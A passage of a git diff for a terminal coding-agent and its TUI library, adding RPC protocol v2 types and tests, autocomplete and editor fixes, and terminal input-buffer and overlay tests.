+	it("init after v1 lock error response shape", () => {
+		// First command was get_state (v1 lock), then init arrives
+		const errorResp: RpcResponse = {
+			id: "req_late_init",
+			type: "response",
+			command: "init",
+			success: false,
+			error: "Protocol version already locked. init must be the first command.",
+		};
+		assert.equal(errorResp.success, false);
+		if (!errorResp.success) {
+			assert.ok(errorResp.error.includes("init must be the first command"));
+		}
+	});
+
+	it("unknown command type produces error response", () => {
+		const errorResp: RpcResponse = {
+			id: "req_unknown",
+			type: "response",
+			command: "nonexistent",
+			success: false,
+			error: "Unknown command: nonexistent",
+		};
+		assert.equal(errorResp.success, false);
+		if (!errorResp.success) {
+			assert.ok(errorResp.error.includes("Unknown command"));
+		}
+	});
+
+	it("malformed JSON parse error shape", () => {
+		const errorResp: RpcResponse = {
+			type: "response",
+			command: "parse",
+			success: false,
+			error: "Failed to parse command: Unexpected token",
+		};
+		assert.equal(errorResp.command, "parse");
+		assert.equal(errorResp.success, false);
+	});
+
+	it("shutdown works in both v1 and v2 — no version gating", () => {
+		// shutdown returns success regardless of protocolVersion
+		const v1Shutdown: RpcResponse = {
+			id: "s1",
+			type: "response",
+			command: "shutdown",
+			success: true,
+		};
+		const v2Shutdown: RpcResponse = {
+			id: "s2",
+			type: "response",
+			command: "shutdown",
+			success: true,
+		};
+		assert.equal(v1Shutdown.success, true);
+		assert.equal(v2Shutdown.success, true);
+	});
+});
+
+// ============================================================================
+// Protocol version detection logic (unit)
+// ============================================================================
+
+describe("Protocol version detection logic", () => {
+	it("simulates v1 lock when first command is non-init", () => {
+		let protocolVersion: 1 | 2 = 1;
+		let protocolLocked = false;
+
+		// Simulate first command being get_state
+		const command = { type: "get_state" } as RpcCommand;
+
+		if (!protocolLocked) {
+			protocolLocked = true;
+			if (command.type === "init") {
+				protocolVersion = 2;
+			} else {
+				protocolVersion = 1;
+			}
+		}
+
+		assert.equal(protocolVersion, 1);
+		assert.equal(protocolLocked, true);
+	});
+
+	it("simulates v2 lock when first command is init", () => {
+		let protocolVersion: 1 | 2 = 1;
+		let protocolLocked = false;
+
+		const command: RpcCommand = { type: "init", protocolVersion: 2 };
+
+		if (!protocolLocked) {
+			protocolLocked = true;
+			if (command.type === "init") {
+				protocolVersion = 2;
+			} else {
+				protocolVersion = 1;
+			}
+		}
+
+		assert.equal(protocolVersion, 2);
+		assert.equal(protocolLocked, true);
+	});
+
+	it("rejects re-init after v2 lock", () => {
+		let protocolLocked = true; // already locked from first init
+		let errorMessage: string | null = null;
+
+		const command: RpcCommand = { type: "init", protocolVersion: 2 };
+
+		if (protocolLocked && command.type === "init") {
+			errorMessage = "Protocol version already locked. init must be the first command.";
+		}
+
+		assert.ok(errorMessage !== null);
+		assert.ok(errorMessage!.includes("already locked"));
+	});
+
+	it("rejects init after v1 lock", () => {
+		let protocolLocked = true; // already locked from first non-init command
+		let protocolVersion: 1 | 2 = 1;
+		let errorMessage: string | null = null;
+
+		const command: RpcCommand = { type: "init", protocolVersion: 2 };
+
+		if (protocolLocked && command.type === "init") {
+			errorMessage = "Protocol version already locked. init must be the first command.";
+		}
+
+		assert.equal(protocolVersion, 1); // stays v1
+		assert.ok(errorMessage !== null);
+	});
+
+	it("extension_ui_response bypasses protocol detection", () => {
+		let protocolLocked = false;
+		let protocolDetectionTriggered = false;
+
+		// Simulate the handleInputLine logic
+		const parsed = { type: "extension_ui_response", id: "ui-1", value: "ok" };
+
+		if (parsed.type === "extension_ui_response") {
+			// Bypass — do not touch protocolLocked
+		} else {
+			protocolDetectionTriggered = true;
+			if (!protocolLocked) {
+				protocolLocked = true;
+			}
+		}
+
+		assert.equal(protocolLocked, false);
+		assert.equal(protocolDetectionTriggered, false);
+	});
+});
+
+// ============================================================================
+// v2 event filter logic (unit)
+// ============================================================================
+
+describe("v2 event filter logic", () => {
+	/** Mimics the server-side event filter check: null means all events pass */
+	function shouldEmit(filter: Set<string> | null, eventType: string): boolean {
+		return !filter || filter.has(eventType);
+	}
+
+	it("null filter passes all events", () => {
+		assert.equal(shouldEmit(null, "agent_end"), true);
+		assert.equal(shouldEmit(null, "cost_update"), true);
+		assert.equal(shouldEmit(null, "anything"), true);
+	});
+
+	it("filter with specific events passes matching events", () => {
+		const filter = new Set(["agent_end", "cost_update"]);
+
+		assert.equal(shouldEmit(filter, "agent_end"), true);
+		assert.equal(shouldEmit(filter, "cost_update"), true);
+		assert.equal(shouldEmit(filter, "execution_complete"), false);
+		assert.equal(shouldEmit(filter, "message_start"), false);
+	});
+
+	it("empty Set filter blocks all events", () => {
+		const filter = new Set<string>();
+
+		assert.equal(shouldEmit(filter, "agent_end"), false);
+		assert.equal(shouldEmit(filter, "cost_update"), false);
+		assert.equal(shouldEmit(filter, "anything"), false);
+		assert.equal(filter.size, 0);
+	});
+
+	it("wildcard subscribe resets filter to null", () => {
+		let eventFilter: Set<string> | null = new Set(["agent_end"]);
+
+		// Simulate subscribe with wildcard
+		const events = ["*"];
+		if (events.includes("*")) {
+			eventFilter = null;
+		} else {
+			eventFilter = new Set(events);
+		}
+
+		assert.equal(eventFilter, null);
+	});
+
+	it("subscribe replaces previous filter", () => {
+		let eventFilter: Set<string> | null = new Set(["agent_end"]);
+
+		// Subscribe with different events
+		const events = ["cost_update", "execution_complete"];
+		if (events.includes("*")) {
+			eventFilter = null;
+		} else {
+			eventFilter = new Set(events);
+		}
+
+		assert.equal(eventFilter!.has("agent_end"), false);
+		assert.equal(eventFilter!.has("cost_update"), true);
+		assert.equal(eventFilter!.has("execution_complete"), true);
+	});
+
+	it("filter applies to both regular and synthesized v2 events", () => {
+		const eventFilter = new Set(["execution_complete"]);
+
+		// Regular event
+		assert.equal(eventFilter.has("agent_end"), false); // filtered out
+		// Synthesized v2 event
+		assert.equal(eventFilter.has("execution_complete"), true); // passes
+		assert.equal(eventFilter.has("cost_update"), false); // filtered out
+	});
+});
+
+// ============================================================================
+// v2 runId injection logic (unit)
+// ============================================================================
+
+describe("v2 runId injection", () => {
+	it("runId is present when protocolVersion is 2 and command is prompt/steer/follow_up", () => {
+		const protocolVersion = 2;
+		const commands = ["prompt", "steer", "follow_up"] as const;
+
+		for (const cmdType of commands) {
+			const runId = protocolVersion === 2 ? `run-${cmdType}-uuid` : undefined;
+			assert.ok(runId !== undefined, `runId should be generated for ${cmdType} in v2`);
+			assert.ok(typeof runId === "string");
+		}
+	});
+
+	it("runId is undefined when protocolVersion is 1", () => {
+		// Test the v1 path: runId should not be generated
+		function generateRunId(version: 1 | 2): string | undefined {
+			return version === 2 ? "run-uuid" : undefined;
+		}
+		assert.equal(generateRunId(1), undefined);
+		assert.ok(typeof generateRunId(2) === "string");
+	});
+
+	it("runId is injected into event output via spread", () => {
+		const currentRunId = "run-abc-123";
+		const event = { type: "message_start", message: { role: "assistant" } };
+
+		// v2 injection logic from rpc-mode.ts
+		const outputEvent = currentRunId ? { ...event, runId: currentRunId } : event;
+
+		assert.equal((outputEvent as any).runId, "run-abc-123");
+		assert.equal((outputEvent as any).type, "message_start");
+	});
+
+	it("runId is not injected when null", () => {
+		const currentRunId: string | null = null;
+		const event = { type: "message_start", message: { role: "assistant" } };
+
+		const outputEvent = currentRunId ? { ...event, runId: currentRunId } : event;
+
+		assert.equal((outputEvent as any).runId, undefined);
+	});
+});
diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts
index a1b7a7711..20d5c2c73 100644
--- a/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts
+++ b/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts
@@ -11,6 +11,13 @@ import type { SessionStats } from "../../core/agent-session.js";
 import type { BashResult } from "../../core/bash-executor.js";
 import type { CompactionResult } from "../../core/compaction/index.js";
 
+// ============================================================================
+// RPC Protocol Versioning
+// ============================================================================
+
+/** Supported protocol versions. v1 is the implicit default; v2 requires an init handshake. */
+export type RpcProtocolVersion = 1 | 2;
+
 // ============================================================================
 // RPC Commands (stdin)
 // ============================================================================
@@ -69,7 +76,12 @@ export type RpcCommand =
 	// Bridge-hosted native terminal
 	| { id?: string; type: "terminal_input"; data: string }
 	| { id?: string; type: "terminal_resize"; cols: number; rows: number }
-	| { id?: string; type: "terminal_redraw" };
+	| { id?: string; type: "terminal_redraw" }
+
+	// v2 Protocol
+	| { id?: string; type: "init"; protocolVersion: 2; clientId?: string }
+	| { id?: string; type: "shutdown"; graceful?: boolean }
+	| { id?: string; type: "subscribe"; events: string[] };
 
 // ============================================================================
 // RPC Slash Command (for get_commands response)
@@ -120,9 +132,9 @@ export interface RpcSessionState {
 // Success responses with data
 export type RpcResponse =
 	// Prompting (async - events follow)
-	| { id?: string; type: "response"; command: "prompt"; success: true }
-	| { id?: string; type: "response"; command: "steer"; success: true }
-	| { id?: string; type: "response"; command: "follow_up"; success: true }
+	| { id?: string; type: "response"; command: "prompt"; success: true; runId?: string }
+	| { id?: string; type: "response"; command: "steer"; success: true; runId?: string }
+	| { id?: string; type: "response"; command: "follow_up"; success: true; runId?: string }
 	| { id?: string; type: "response"; command: "abort"; success: true }
 	| { id?: string; type: "response"; command: "new_session"; success: true; data: { cancelled: boolean } }
 
@@ -216,9 +228,54 @@ export type RpcResponse =
 	| { id?: string; type: "response"; command: "terminal_resize"; success: true }
 	| { id?: string; type: "response"; command: "terminal_redraw"; success: true }
 
+	// v2 Protocol
+	| { id?: string; type: "response"; command: "init"; success: true; data: RpcInitResult }
+	| { id?: string; type: "response"; command: "shutdown"; success: true }
+	| { id?: string; type: "response"; command: "subscribe"; success: true }
+
 	// Error response (any command can fail)
 	| { id?: string; type: "response"; command: string; success: false; error: string };
 
+// ============================================================================
+// v2 Protocol Types
+// ============================================================================
+
+/** Result of the init handshake (v2 only) */
+export interface RpcInitResult {
+	protocolVersion: 2;
+	sessionId: string;
+	capabilities: {
+		events: string[];
+		commands: string[];
+	};
+}
+
+/** v2 execution_complete event — emitted when a prompt/steer/follow_up finishes */
+export interface RpcExecutionCompleteEvent {
+	type: "execution_complete";
+	runId: string;
+	status: "completed" | "error" | "cancelled";
+	reason?: string;
+	stats: SessionStats;
+}
+
+/** v2 cost_update event — emitted per-turn with running cost data */
+export interface RpcCostUpdateEvent {
+	type: "cost_update";
+	runId: string;
+	turnCost: number;
+	cumulativeCost: number;
+	tokens: {
+		input: number;
+		output: number;
+		cacheRead: number;
+		cacheWrite: number;
+	};
+}
+
+/** Discriminated union of all v2-only event types */
+export type RpcV2Event = RpcExecutionCompleteEvent | RpcCostUpdateEvent;
+
 // ============================================================================
 // Extension UI Events (stdout)
 // ============================================================================
diff --git a/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts b/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts
index f31a40b7b..b4c1dd6dd 100644
--- a/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts
+++ b/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts
@@ -1,5 +1,5 @@
 import assert from "node:assert/strict";
-import { describe, it, mock } from "node:test";
+import { describe, it, afterEach } from "node:test";
 import { mkdtempSync, rmSync, readFileSync, existsSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
@@ -15,84 +15,84 @@ function wait(ms: number): Promise<void> {
 }
 
 describe("MemoryStorage debounced persistence", () => {
-	it("multiple rapid mutations only trigger one persist write", async () => {
-		const dir = makeTmpDir();
-		const dbPath = join(dir, "test.db");
-		try {
-			const storage = await MemoryStorage.create(dbPath);
+	let dir: string;
 
-			const initialStat = readFileSync(dbPath);
-			const initialMtime = initialStat.length;
-
-			storage.upsertThreads([
-				{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
-			]);
-			storage.upsertThreads([
-				{ threadId: "t2", filePath: "/b.txt", fileSize: 200, fileMtime: 2000, cwd: "/proj" },
-			]);
-			storage.upsertThreads([
-				{ threadId: "t3", filePath: "/c.txt", fileSize: 300, fileMtime: 3000, cwd: "/proj" },
-			]);
-
-			const afterMutationsBuf = readFileSync(dbPath);
-			assert.deepEqual(
-				afterMutationsBuf,
-				initialStat,
-				"File should not have been written yet (debounce window has not elapsed)",
-			);
-
-			await wait(700);
-
-			const afterDebounceBuf = readFileSync(dbPath);
-			assert.notDeepEqual(
-				afterDebounceBuf,
-				initialStat,
-				"File should have been written after debounce window elapsed",
-			);
-
-			const stats = storage.getStats();
-			assert.equal(stats.totalThreads, 3);
-
-			storage.close();
-		} finally {
+	afterEach(() => {
+		if (dir) {
 			rmSync(dir, { recursive: true, force: true });
 		}
 	});
 
+	it("multiple rapid mutations only trigger one persist write", async () => {
+		dir = makeTmpDir();
+		const dbPath = join(dir, "test.db");
+		const storage = await MemoryStorage.create(dbPath);
+
+		const initialStat = readFileSync(dbPath);
+		const initialMtime = initialStat.length;
+
+		storage.upsertThreads([
+			{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
+		]);
+		storage.upsertThreads([
+			{ threadId: "t2", filePath: "/b.txt", fileSize: 200, fileMtime: 2000, cwd: "/proj" },
+		]);
+		storage.upsertThreads([
+			{ threadId: "t3", filePath: "/c.txt", fileSize: 300, fileMtime: 3000, cwd: "/proj" },
+		]);
+
+		const afterMutationsBuf = readFileSync(dbPath);
+		assert.deepEqual(
+			afterMutationsBuf,
+			initialStat,
+			"File should not have been written yet (debounce window has not elapsed)",
+		);
+
+		await wait(700);
+
+		const afterDebounceBuf = readFileSync(dbPath);
+		assert.notDeepEqual(
+			afterDebounceBuf,
+			initialStat,
+			"File should have been written after debounce window elapsed",
+		);
+
+		const stats = storage.getStats();
+		assert.equal(stats.totalThreads, 3);
+
+		storage.close();
+	});
+
 	it("close() flushes pending changes immediately without waiting for debounce", async () => {
-		const dir = makeTmpDir();
+		dir = makeTmpDir();
 		const dbPath = join(dir, "test.db");
-		try {
-			const storage = await MemoryStorage.create(dbPath);
+		const storage = await MemoryStorage.create(dbPath);
 
-			const initialBuf = readFileSync(dbPath);
+		const initialBuf = readFileSync(dbPath);
 
-			storage.upsertThreads([
-				{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
-			]);
+		storage.upsertThreads([
+			{ threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" },
+		]);
 
-			const beforeCloseBuf = readFileSync(dbPath);
-			assert.deepEqual(
-				beforeCloseBuf,
-				initialBuf,
-				"File should not have been written yet (debounce window has not elapsed)",
-			);
+		const beforeCloseBuf = readFileSync(dbPath);
+		assert.deepEqual(
+			beforeCloseBuf,
+			initialBuf,
+			"File should not have been written yet (debounce window has not elapsed)",
+		);
 
-			storage.close();
+		storage.close();
 
-			const afterCloseBuf = readFileSync(dbPath);
-			assert.notDeepEqual(
-				afterCloseBuf,
-				initialBuf,
-				"File should have been written immediately on close()",
-			);
+		const afterCloseBuf = readFileSync(dbPath);
+		assert.notDeepEqual(
+			afterCloseBuf,
+			initialBuf,
+			"File should have been written immediately on close()",
+		);
 
-			const reopened = await MemoryStorage.create(dbPath);
-			const stats = reopened.getStats();
-			assert.equal(stats.totalThreads, 1, "Data should be persisted and readable after close");
-			reopened.close();
-		} finally {
-			rmSync(dir, { recursive: true, force: true });
-		}
+		const reopened = await MemoryStorage.create(dbPath);
+		const stats = reopened.getStats();
+		assert.equal(stats.totalThreads, 1, "Data should be persisted and readable after close");
+		reopened.close();
 	});
 });
diff --git a/packages/pi-coding-agent/src/utils/shell.ts b/packages/pi-coding-agent/src/utils/shell.ts
index ba77a4441..86708125f 100644
--- a/packages/pi-coding-agent/src/utils/shell.ts
+++ b/packages/pi-coding-agent/src/utils/shell.ts
@@ -192,7 +192,6 @@ export function killProcessTree(pid: number): void {
 		try {
 			spawn("taskkill", ["/F", "/T", "/PID", String(pid)], {
 				stdio: "ignore",
-				detached: true,
 			});
 		} catch {
 			// Ignore errors if taskkill fails
diff --git a/packages/pi-tui/src/__tests__/autocomplete.test.ts b/packages/pi-tui/src/__tests__/autocomplete.test.ts
index c4a44db76..e065f8f6b 100644
--- a/packages/pi-tui/src/__tests__/autocomplete.test.ts
+++ b/packages/pi-tui/src/__tests__/autocomplete.test.ts
@@ -52,6 +52,14 @@ describe("CombinedAutocompleteProvider — slash commands", () => {
 		const result = provider.getSuggestions(["hello /se"], 0, 9);
 		assert.equal(result, null);
 	});
+
+	it("triggers slash commands after leading whitespace", () => {
+		const provider = makeProvider(sampleCommands);
+		const result = provider.getSuggestions(["  /se"], 0, 5);
+		assert.ok(result);
+		assert.equal(result!.prefix, "/se");
+		assert.ok(result!.items.some((item) => item.value === "settings"));
+	});
 });
 
 describe("CombinedAutocompleteProvider — argument completions", () => {
@@ -144,6 +152,13 @@ describe("CombinedAutocompleteProvider — applyCompletion", () => {
 		assert.equal(result.cursorCol, 10); // after "/settings "
 	});
 
+	it("preserves leading whitespace when applying slash command completion", () => {
+		const provider = makeProvider(sampleCommands);
+		const result = provider.applyCompletion(["  /se"], 0, 5, { value: "settings", label: "settings" }, "/se");
+		assert.equal(result.lines[0], "  /settings ");
+		assert.equal(result.cursorCol, 12);
+	});
+
 	it("applies file path completion for @ prefix", () => {
 		const provider = makeProvider();
 		const result = provider.applyCompletion(
diff --git a/packages/pi-tui/src/__tests__/overlay-layout.test.ts b/packages/pi-tui/src/__tests__/overlay-layout.test.ts
new file mode 100644
index 000000000..49d0539da
--- /dev/null
+++ b/packages/pi-tui/src/__tests__/overlay-layout.test.ts
@@ -0,0 +1,82 @@
+// pi-tui — Overlay Layout Tests (backdrop dimming)
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { compositeOverlays, type OverlayEntry } from "../overlay-layout.js";
+
+function makeEntry(
+	lines: string[],
+	options?: OverlayEntry["options"],
+): OverlayEntry {
+	return {
+		component: { render: () => lines },
+		options,
+		hidden: false,
+		focusOrder: 1,
+	};
+}
+
+describe("compositeOverlays — backdrop", () => {
+	it("dims base lines when backdrop is true", () => {
+		const base = ["hello world", "second line"];
+		const overlay = makeEntry(["OVERLAY"], {
+			width: 7,
+			anchor: "top-left",
+			backdrop: true,
+		});
+
+		const result = compositeOverlays(base, [overlay], 20, 20, 2);
+
+		// All base lines in viewport should contain dim escape (\x1b[2m)
+		// The overlay line itself is composited on top, but underlying lines get dimmed
+		const dimmedLine = result.find((l) => l.includes("second line"));
+		assert.ok(dimmedLine, "should have a line containing 'second line'");
+		assert.ok(dimmedLine.includes("\x1b[2m"), "base line should be dimmed");
+	});
+
+	it("backdrop uses gray foreground for dimming", () => {
+		const base = ["hello world", "second line"];
+		const overlay = makeEntry(["OV"], {
+			width: 2,
+			anchor: "top-left",
+			backdrop: true,
+		});
+
+		const result = compositeOverlays(base, [overlay], 20, 20, 2);
+
+		// Check a non-overlay line for backdrop codes (dim + gray fg, no bg)
+		const line = result.find((l) => l.includes("second line"));
+		assert.ok(line, "should have a line containing 'second line'");
+		assert.ok(line.includes("\x1b[38;5;240m"), "backdrop should set gray foreground");
+		assert.ok(!line.includes("\x1b[48;"), "backdrop should not set background color");
+	});
+
+	it("does not dim when backdrop is false/absent", () => {
+		const base = ["hello world", "second line"];
+		const overlay = makeEntry(["OVERLAY"], {
+			width: 7,
+			anchor: "top-left",
+		});
+
+		const result = compositeOverlays(base, [overlay], 20, 20, 2);
+
+		// Lines not covered by overlay should remain undimmed
+		const secondLine = result.find((l) => l.includes("second line"));
+		assert.ok(secondLine, "should have a line containing 'second line'");
+		assert.ok(!secondLine.includes("\x1b[2m"), "base line should not be dimmed");
+	});
+
+	it("overlay content renders on top of dimmed background", () => {
+		const base = ["aaaaaaaaaa"];
+		const overlay = makeEntry(["XX"], {
+			width: 2,
+			anchor: "top-left",
+			backdrop: true,
+		});
+
+		const result = compositeOverlays(base, [overlay], 10, 10, 1);
+
+		// The first line should contain the overlay text
+		assert.ok(result[0].includes("XX"), "overlay text should be composited");
+	});
+});
diff --git a/packages/pi-tui/src/__tests__/stdin-buffer.test.ts b/packages/pi-tui/src/__tests__/stdin-buffer.test.ts
new file mode 100644
index 000000000..ba053567b
--- /dev/null
+++ b/packages/pi-tui/src/__tests__/stdin-buffer.test.ts
@@ -0,0 +1,43 @@
+import assert from "node:assert/strict";
+import { describe, it } from "node:test";
+import { setTimeout as delay } from "node:timers/promises";
+
+import { StdinBuffer } from "../stdin-buffer.js";
+
+describe("StdinBuffer", () => {
+	it("flushes a lone Escape keypress", async () => {
+		const buffer = new StdinBuffer({ timeout: 5 });
+		const received: string[] = [];
+		buffer.on("data", (sequence) => received.push(sequence));
+
+		buffer.process("\x1b");
+		await delay(20);
+
+		assert.deepEqual(received, ["\x1b"]);
+		assert.equal(buffer.getBuffer(), "");
+	});
+
+	it("keeps split CSI focus and mouse sequences buffered until completion", async () => {
+		const buffer = new StdinBuffer({ timeout: 5 });
+		const received: string[] = [];
+		buffer.on("data", (sequence) => received.push(sequence));
+
+		buffer.process("\x1b[");
+		await delay(20);
+		assert.deepEqual(received, []);
+		assert.equal(buffer.getBuffer(), "\x1b[");
+
+		buffer.process("I");
+		assert.deepEqual(received, ["\x1b[I"]);
+		assert.equal(buffer.getBuffer(), "");
+
+		buffer.process("\x1b[<35;20;");
+		await delay(20);
+		assert.deepEqual(received, ["\x1b[I"]);
+		assert.equal(buffer.getBuffer(), "\x1b[<35;20;");
+
+		buffer.process("5m");
+		assert.deepEqual(received, ["\x1b[I", "\x1b[<35;20;5m"]);
+		assert.equal(buffer.getBuffer(), "");
+	});
+});
diff --git a/packages/pi-tui/src/__tests__/tui.test.ts b/packages/pi-tui/src/__tests__/tui.test.ts
new file mode 100644
index 000000000..7c4903dc7
--- /dev/null
+++ b/packages/pi-tui/src/__tests__/tui.test.ts
@@ -0,0 +1,50 @@
+import assert from "node:assert/strict";
+import { describe, it } from "node:test";
+
+import { TUI } from "../tui.js";
+import type { Terminal } from "../terminal.js";
+
+function makeTerminal(): Terminal {
+	return {
+		isTTY: true,
+		columns: 80,
+		rows: 24,
+		kittyProtocolActive: false,
+		start() {},
+		stop() {},
+		drainInput: async () => {},
+		write() {},
+		moveBy() {},
+		hideCursor() {},
+		showCursor() {},
+		clearLine() {},
+		clearFromCursor() {},
+		clearScreen() {},
+		setTitle() {},
+	};
+}
+
+describe("TUI", () => {
+	it("does not swallow a bare Escape keypress while waiting for the cell-size response", () => {
+		const tui = new TUI(makeTerminal());
+		const received: string[] = [];
+
+		tui.setFocus({
+			render: () => [],
+			handleInput: (data: string) => {
+				received.push(data);
+			},
+			invalidate() {},
+		});
+
+		const anyTui = tui as any;
+		anyTui.cellSizeQueryPending = true;
+		anyTui.inputBuffer = "";
+
+		anyTui.handleInput("\x1b");
+
+		assert.deepEqual(received, ["\x1b"]);
+		assert.equal(anyTui.cellSizeQueryPending, false);
+		assert.equal(anyTui.inputBuffer, "");
+	});
+});
diff --git a/packages/pi-tui/src/autocomplete.ts b/packages/pi-tui/src/autocomplete.ts
index d0969921f..1ecd1e754 100644
--- a/packages/pi-tui/src/autocomplete.ts
+++ b/packages/pi-tui/src/autocomplete.ts
@@ -159,6 +159,7 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider {
 	): { items: AutocompleteItem[]; prefix: string } | null {
 		const currentLine = lines[cursorLine] || "";
 		const textBeforeCursor = currentLine.slice(0, cursorCol);
+		const trimmedBeforeCursor = textBeforeCursor.trimStart();
 
 		// Check for @ file reference (fuzzy search) - must be after a delimiter or at start
 		const atPrefix = this.extractAtPrefix(textBeforeCursor);
@@ -174,12 +175,12 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider {
 		}
 
 		// Check for slash commands
-		if (textBeforeCursor.startsWith("/")) {
-			const spaceIndex = textBeforeCursor.indexOf(" ");
+		if (trimmedBeforeCursor.startsWith("/")) {
+			const spaceIndex = trimmedBeforeCursor.indexOf(" ");
 
 			if (spaceIndex === -1) {
 				// No space yet - complete command names with fuzzy matching
-				const prefix = textBeforeCursor.slice(1); // Remove the "/"
+				const prefix = trimmedBeforeCursor.slice(1); // Remove the "/"
 				const commandItems = this.commands.map((cmd) => ({
 					name: "name" in cmd ? cmd.name : cmd.value,
 					label: "name" in cmd ? cmd.name : cmd.label,
@@ -196,12 +197,12 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider {
 
 				return {
 					items: filtered,
-					prefix: textBeforeCursor,
+					prefix: `/${prefix}`,
 				};
 			} else {
 				// Space found - complete command arguments
-				const commandName = textBeforeCursor.slice(1, spaceIndex); // Command without "/"
-				const argumentText = textBeforeCursor.slice(spaceIndex + 1); // Text after space
+				const commandName = trimmedBeforeCursor.slice(1, spaceIndex); // Command without "/"
+				const argumentText = trimmedBeforeCursor.slice(spaceIndex + 1); // Text after space
 
 				const command = this.commands.find((cmd) => {
 					const name = "name" in cmd ? cmd.name : cmd.value;
@@ -269,7 +270,8 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider {
 
 		// Check if we're completing a slash command (prefix starts with "/" but NOT a file path)
 		// Slash commands are at the start of the line and don't contain path separators after the first /
-		const isSlashCommand = prefix.startsWith("/") && beforePrefix.trim() === "" && !prefix.slice(1).includes("/");
+		const trimmedPrefix = prefix.trimStart();
+		const isSlashCommand = trimmedPrefix.startsWith("/") && beforePrefix.trim() === "" && !trimmedPrefix.slice(1).includes("/");
 		if (isSlashCommand) {
 			// This is a command name completion
 			const newLine = `${beforePrefix}/${item.value} ${adjustedAfterCursor}`;
diff --git a/packages/pi-tui/src/components/__tests__/editor.test.ts b/packages/pi-tui/src/components/__tests__/editor.test.ts
new file mode 100644
index 000000000..057ed20da
--- /dev/null
+++ b/packages/pi-tui/src/components/__tests__/editor.test.ts
@@ -0,0 +1,64 @@
+import assert from "node:assert/strict";
+import { describe, it } from "node:test";
+
+import { Editor, type EditorTheme } from "../editor.js";
+import { CURSOR_MARKER, TUI } from "../../tui.js";
+import type { Terminal } from "../../terminal.js";
+
+function makeTerminal(): Terminal {
+	return {
+		isTTY: true,
+		columns: 80,
+		rows: 24,
+		kittyProtocolActive: false,
+		start() {},
+		stop() {},
+		drainInput: async () => {},
+		write() {},
+		moveBy() {},
+		hideCursor() {},
+		showCursor() {},
+		clearLine() {},
+		clearFromCursor() {},
+		clearScreen() {},
+		setTitle() {},
+	};
+}
+
+const theme: EditorTheme = {
+	borderColor: (text) => text,
+	selectList: {
+		selectedPrefix: (text) => text,
+		selectedText: (text) => text,
+		description: (text) => text,
+		scrollInfo: (text) => text,
+		noMatch: (text) => text,
+	},
+};
+
+describe("Editor", () => {
+	it("clears bracketed paste state when focus is lost", () => {
+		const editor = new Editor(new TUI(makeTerminal()), theme);
+		editor.focused = true;
+
+		editor.handleInput("\x1b[200~partial");
+		editor.focused = false;
+		editor.focused = true;
+		editor.handleInput("hello");
+
+		assert.equal(editor.getText(), "hello");
+	});
+
+	it("keeps the hardware cursor marker visible while autocomplete is open", () => {
+		const editor = new Editor(new TUI(makeTerminal()), theme);
+		editor.focused = true;
+		editor.setText("/se");
+
+		(editor as any).autocompleteState = "regular";
+		(editor as any).autocompleteList = { render: () => [] };
+
+		const rendered = editor.render(40).join("\n");
+
+		assert.ok(rendered.includes(CURSOR_MARKER));
+	});
+});
diff --git a/packages/pi-tui/src/components/box.ts b/packages/pi-tui/src/components/box.ts
index c99b8600b..9dd692750 100644
--- a/packages/pi-tui/src/components/box.ts
+++ b/packages/pi-tui/src/components/box.ts
@@ -31,6 +31,16 @@ export class Box implements Component {
 		this.invalidateCache();
 	}
 
+	insertChildBefore(component: Component, before: Component): void {
+		const index = this.children.indexOf(before);
+		if (index !== -1) {
+			this.children.splice(index, 0, component);
+		} else {
+			this.children.push(component);
+		}
+		this.invalidateCache();
+	}
+
 	removeChild(component: Component): void {
 		const index = this.children.indexOf(component);
 		if (index !== -1) {
diff --git a/packages/pi-tui/src/components/editor.ts b/packages/pi-tui/src/components/editor.ts
index c9cefb83c..b370445c9 100644
--- a/packages/pi-tui/src/components/editor.ts
+++ b/packages/pi-tui/src/components/editor.ts
@@ -128,7 +128,17 @@ export class Editor implements Component, Focusable {
 	};
 
 	/** Focusable interface - set by TUI when focus changes */
-	focused: boolean = false;
+	private _focused: boolean = false;
+	get focused(): boolean {
+		return this._focused;
+	}
+	set focused(value: boolean) {
+		this._focused = value;
+		if (!value) {
+			this.isInPaste = false;
+			this.pasteBuffer = "";
+		}
+	}
 
 	protected tui: TUI;
 	private theme: EditorTheme;
@@ -376,8 +386,9 @@ export class Editor implements Component, Focusable {
 		}
 
 		// Render each visible layout line
-		// Emit hardware cursor marker only when focused and not showing autocomplete
-		const emitCursorMarker = this.focused && !this.autocompleteState;
+		// Keep the hardware cursor anchored while autocomplete is open so IME
+		// candidate windows still attach to the editor caret.
+		const emitCursorMarker = this.focused;
 
 		for (const layoutLine of visibleLines) {
 			let displayText = layoutLine.text;
diff --git a/packages/pi-tui/src/components/image.test.ts b/packages/pi-tui/src/components/image.test.ts
new file mode 100644
index 000000000..3bef04a85
--- /dev/null
+++ b/packages/pi-tui/src/components/image.test.ts
@@ -0,0 +1,36 @@
+/**
+ * Regression test for #3455: Image component must not trigger infinite
+ * re-render loop when dimensions resolve in cmux sessions.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { Image } from "./image.js";
+
+describe("Image component (#3455)", () => {
+	const theme = { fallbackColor: (s: string) => s };
+
+	test("getDimensions returns undefined before resolution", () => {
+		// Pass explicit dimensions to avoid async parsing
+		const img = new Image("base64data", "image/png", theme, {});
+		// Without explicit dims, getDimensions should be undefined until async resolve
+		// But we can't easily test async here, so verify the method exists
+		assert.equal(typeof img.getDimensions, "function");
+	});
+
+	test("getDimensions returns dimensions when provided at construction", () => {
